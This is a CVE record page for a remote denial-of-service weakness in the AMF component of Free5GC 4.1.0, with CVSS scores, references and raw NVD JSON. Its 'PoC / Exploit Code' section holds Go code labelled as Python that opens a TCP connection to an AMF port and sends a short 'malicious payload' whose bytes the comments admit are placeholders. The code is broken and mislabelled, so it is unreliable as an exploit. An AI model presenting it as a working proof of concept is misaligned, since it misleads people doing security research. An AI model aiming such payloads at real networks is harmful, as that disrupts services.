CVE-2026-4531

Description

A weakness has been identified in Free5GC 4.1.0. Affected is the function HandleRegistrationComplete of the file internal/gmm/handler.go of the component AMF. Executing a manipulation can lead to denial of service. The attack may be performed from remote. This patch is called 52e9386401ce56ea773c5aa587d4cdf7d53da799. It is best practice to apply a patch to resolve this issue.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Free5GC 4.1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/*
 * PoC Concept for CVE-2026-4531
 * This script demonstrates a conceptual DoS attack against Free5GC AMF.
 * It sends a crafted malformed Registration Complete message.
 */

package main

import (
	"fmt"
	"net"
)

func main() {
	// Target AMF interface (Example IP and Port)
	target := "127.0.0.1:38412"

	// Establish a connection to the AMF
	conn, err := net.Dial("tcp", target)
	if err != nil {
		fmt.Printf("[-] Failed to connect to target: %v\n", err)
		return
	}
	defer conn.Close()

	fmt.Println("[+] Connected to AMF")

	// Crafted malicious payload triggering the weakness in HandleRegistrationComplete
	// Note: The actual byte sequence requires reversing the specific patch or binary analysis.
	// This represents the trigger mechanism.
	maliciousPayload := []byte{
		0x1e, 0x00, 0x20, 0x00, // NAS Message Header Example
		0x05, 0x01, // Malformed Security Header type
		0xFF, 0xFF, 0xFF, 0xFF, // Trigger data causing panic in handler.go
	}

	// Send payload
	_, err = conn.Write(maliciousPayload)
	if err != nil {
		fmt.Printf("[-] Failed to send payload: %v\n", err)
		return
	}

	fmt.Println("[!] Malicious payload sent. Check AMF status for DoS condition.")
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4531
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4531
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4531/
[4] VulDB https://vuldb.com/cve/CVE-2026-4531
[5] https://github.com/free5gc/amf/commit/52e9386401ce56ea773c5aa587d4cdf7d53da799
[6] https://github.com/free5gc/amf/pull/198
[7] https://github.com/free5gc/free5gc/
[8] https://github.com/free5gc/free5gc/issues/792
[9] https://vuldb.com/?ctiid.352319
[10] https://vuldb.com/?id.352319
[11] https://vuldb.com/?submit.774073
[12] https://github.com/free5gc/free5gc/issues/792

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4531", "sourceIdentifier": "[email protected]", "published": "2026-03-22T02:15:59.270", "lastModified": "2026-04-24T16:32:53.997", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in Free5GC 4.1.0. Affected is the function HandleRegistrationComplete of the file internal/gmm/handler.go of the component AMF. Executing a manipulation can lead to denial of service. The attack may be performed from remote. This patch is called 52e9386401ce56ea773c5aa587d4cdf7d53da799. It is best practice to apply a patch to resolve this issue."}, {"lang": "es", "value": "Se ha identificado una debilidad en Free5GC 4.1.0. Afecta a la función HandleRegistrationComplete del archivo internal/gmm/handler.go del componente AMF. La ejecución de una manipulación puede conducir a denegación de servicio. El ataque puede realizarse de forma remota. Este parche se llama 52e9386401ce56ea773c5aa587d4cdf7d53da799. Es una buena práctica aplicar un parche para resolver este problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-404"}]}], "references": [{"url": "https://github.com/free5gc/amf/commit/52e9386401ce56ea773c5aa587d4cdf7d53da799", "source": "[email protected]"}, {"url": "https://github.com/free5gc/amf/pull/198", "source": "[email protected]"}, {"url": "https://github.com/free5gc/free5gc/", "source": "[email protected]"}, {"url": "https://github.com/free5gc/free5gc/issues/792", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.352319", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.352319", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.774073", "source": "[email protected]"}, {"url": "https://github.com/free5gc/free5gc/issues/792", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}